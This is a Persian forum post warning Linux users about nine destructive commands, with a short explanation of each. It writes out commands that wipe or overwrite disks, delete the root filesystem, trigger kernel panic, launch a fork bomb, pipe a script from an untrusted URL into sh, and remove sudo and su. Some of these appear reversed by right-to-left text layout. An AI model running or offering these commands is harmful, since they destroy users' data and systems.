۹ دستور خطرناک لینوکس که نباید اجرا کنید

aria68

عضو جدید
سیستم عامل لینوکس می تواند مانن شمشیر دولبه عمل کند. این سیستم عامل با این فرض که شما می دانید چه می کنید ، آزادی عمل فراوانی به شما داده است و با استفاده از دستورات مختلف ، کارهای فراوانی می توانید انجام دهید. این موضوع برای هنگامی مناسب است که شما دانش کافی استفاده از لینوکس را داشته باشید، در غیر این صورت با فعال سازی یک دستور ، می توانید باعث شوید که سیستمتان در عرض چند ثانیه غیرقابل استفاده شود. شما چه کاربر مبتدی باشید چه پیشرفته ، فرقی نمی کند ،هرگز نباید دستوری را اجرا کنید مگر اینکه بدانید که دقیقا چه کاری انجام می شود. در پست ۹ دستور خطرناک لینوکس، برخی از مرگبارترین این دستورات لینوکس را با هم مرور می کنیم.
منبع این آموزش سایت دانشنامه آموزشی رایمون می باشد

0033.jpg
[h=5]Delete Recursively[/h] توانایی لینوکس در پاک کردن هر چیزی به نوعی امتیاز برای آن حساب می شود ، به خصوص اگر با خطای That file can’t be deleted در ویندوز مواجه شده باشید ، این امتیاز را بهتر درک می کنید. اما ترول های اینترنتی ممکن است شما را فریب بدهند و یک دستور خطرناک را به شما ارائه دهند که این دستور موجب می شود کل هارد دیسک شما به طور کامل پاک بشود.
/ rm -rf
این خط فرمان دو کار را انجام می دهد : با استفاده از r- تمامی زیر شاخه ها را پاک می کند و با استفاده از f- تمام فایل های Read only را بدون گرفتن تایید، پاک می کند. این دستور در Root اجرا می شود و کل سیستم را پاک می کند.​
[h=5]Format Hard Drive[/h] استفاده از ترمینال برای تازه کارها دشوار و پیچیده است چون لینوکس از راه های مختلف دستوراتی را فراهم کرده است که راه اندازی آن ها منجر به پاک شدن کامل هارد دیسک می شود. حذف بازگشتی یکی از آن ها بود ، ولی در اینجا یک دستور دیگر هم داریم:
mkfs.ext3 /dev/hda

این دستور به منظور استفاده از سیستم فایل ext3 ، هار دیسک را فرمت می کند. فرمت کردن هارد دیسک یک عمل ذاتا مخرب نیست ، اما این عمل باعث می شود درایو مانند زمانی شود که هنوز از آن استفاده ای نشده بود. به عبارت دیگر مثل یک تخت سنگ سفید می شود.​
فرمت کردن برای پارتیشن بندی و external drive ها کاربرد دارد، ولی انجام این عمل روی هاردهای داخلی مثل dev/hda می تواند بسیار خطرناک باشد ، زیرا سیستم شما را به حالت غیرقابل بازیابی می برد.

[h=5]Overwrite Hard Drive[/h] بعد از دستور خطرناک فرمت کردن هارد درایو شما ، دستور دیگری که می تواند باعث دردسر شما شود ، دستور بازنویسی روی هارد درایو دستگاه است.
command > /dev/hda
در دستور بالا عملگر < تغییر مسیر خروجی را از چپ به راست اعمال می کند.​
[h=5]Wipe Hard Drive[/h] در این جا دستور دیگری که باعث تخریب سیستم شما می شود را با هم مرور می کنیم. با این دستور هارد درایو شما به طور کامل تبدیل به صفر می شود، بدون این که بازنویسی یا عمل دیگری روی آن صورت پذیرد. تمامی داده ها به طور کامل پاک شده و هارد دیسک شما کاملا پاک می گردد.
dd if=/dev/zero of=/dev/hda
دستور dd ، یک دستور سطح پایین است که معمولا برای ارسال اطلاعات به دیسک های فیزیکی از آن استفاده می شود. پارامتر if برای تعیین منبع داده ها استفاده می گردد که در این مورد dev/zero تولید یک جریان نامتناهی صفر می کند. پاامتر of مقصد جریان نامتنهاهی صفر را در /dev/hda مشخص می کند.
دلایل منطقی برای صفر کردن یک درایو وجود دارد ، ولی اگر به این دلایل آشنایی ندارید به شما توصیه اکید می شود که از این دستور دوری کنید.
[h=5]Implode Hard Drive[/h] در سیستم عامل لینوکس ، فایل های مخصوصی به نام dev/null وجوود دارد که هر داده که در آن نوشته شود را دور می ریزد و از بین خواهد برد. شما می توانید آن را به یک سیاهچاله تشبیه کنید.
mv / /dev/null
دستور mv ، دایرکتوری روت سیستم را به این سیاهچاله منتقل می کند. نتیجه ویرانگر است. اطلاعات هترد دیسک شما به طور کامل خورده می شود و چیزی باقی نمی ماند.​
[h=5]Cause Kernel Panic[/h] حتما اسم صفحه ی بدنام Blue Screen یا همان صفحه ی مرگ را در ویندوز شنیده اید. سیستم عامل لینوکس برخلاف آنچه گفته می شود ، یک سیستم کاملا امن نیست. گاهی اوقات یک خطای داخلی رخ می دهد که درست شدن آن امکان پذیر نیست. در این زمان ها با چیزی مانند صفحه ی مرگ ویندوز روبرو می شوید: kernel panic
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
پیچیدگی های دستور فوق مهم نیست. آنچه مهم هست در هنگام بااجرای هر خط از دستورات فوق ، kernel panic را فعالسازی می کنید، در نتیجه شما مجبور می شوید سیستم خود را دوباره راه اندازی کنید.​
[h=5]Fork Bomb[/h] Bash زبان ترمینال لینوکس است و بسیار قدرتمند هم می باشد. نه تنها دستورات را اجرا می کند ، بلکه می تواند توابع را هم راه اندازی کند که باعث می شود نوشتن اسکریپت آسوده تر شود. متاسفانه ، توابع در درون خود هم دارای خطراتی هستند:
:;{&:|:}():
این دستور مبهم یک fork bomb است که نوعی از kernel panic است. این دستور یک تابع را تعریف می کند که به صورت بازگشتی در هنگام اجرا شدن ، دو بار خود را فراخوانی می کند. فراخوانی بازگشتی در پیش زمینه صورت می گیرد در حالی که در پس زمینه فعالیت دیگری در حال رخ دادن است.​
در واقع هربار که این تابع فراخوانی می شود ، باعث می شود دو پروسه دیگر به وجود بیاید و بعد دوباره آن پروسه ها ، دو پروسه دیگر را ایجاد می کنند و این روال در یک حلقه ی بینهایت ادامه دارد. تنها راه خروج از این حلقه ، راه اندازی دوباره ی سیستم است.​
[h=5]Execute Remote Script[/h] در اینجا با فرمانی مواجه هستیم که درواقع مفید هم می تواند باشد. دستور wget محتوای آدرس وب را بازیابی می کند که می تواند برای دسترسی به یک سایت یا دانلود یک فایل مفید باشد. با این حال یک ترفند ساده می تواند آن را تبدیل به یک خطر بزرگ کند.
wget http://an-untrusted-url -O- | sh
ترکیب بالا ، مطالب آدرس داده شده را دانلود می کند و بلافاصله آن ها را به فرمان shal ، فید می کند که باعث می شود محتویات دانلود شده در ترمینال اجرا شوند. اگر آدرس یک اسکریپت مخرب باشد ، سیستم شما با مشکل مواجه می شود.​
[h=5]Disable Root Command Rights[/h] این دستور بسیار سرراست است. این فرمان با بهره گیری از دستور rm ، دوتا از مهم ترین دستورات لینوکس ، sudo و su را غیر فعال می کند. این دو دستور اجازه ی اجرای دستورات دیگر را با مجوز روت می دهد. بدون این دو دستور ادامه کار با لینوکس وحشتناک خواهد بود.
rm -f /usr/bin/sudo;rm -f /bin/su

 

Similar threads

بالا